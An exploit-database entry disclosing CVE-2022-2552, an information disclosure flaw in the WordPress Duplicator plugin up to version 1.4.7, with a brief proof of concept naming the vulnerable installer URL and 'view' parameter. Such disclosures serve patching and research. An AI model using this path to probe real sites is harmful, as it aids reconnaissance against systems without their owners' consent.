Share
## https://sploitus.com/exploit?id=PACKETSTORM:167895
# Exploit Title: WordPress Plugin Duplicator 1.4.7 - Information Disclosure  
# Google Dork: N/A  
# Date: 07.27.2022  
# Exploit Author: SecuriTrust  
# Vendor Homepage: https://snapcreek.com/  
# Software Link: https://wordpress.org/plugins/duplicator/  
# Version: <= 1.4.7  
# Tested on: Linux, Windows  
# CVE : CVE-2022-2552  
# Reference: https://securitrust.fr  
# Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2552  
  
#Product:  
WordPress Plugin Duplicator <= 1.4.7  
  
#Vulnerability:  
1-Some system information may be disclosure.  
  
#Proof-Of-Concept:  
1-System information.  
Some system information is obtained using the "view" parameter.  
http://[PATH]/backups-dup-lite/dup-installer/main.installer.php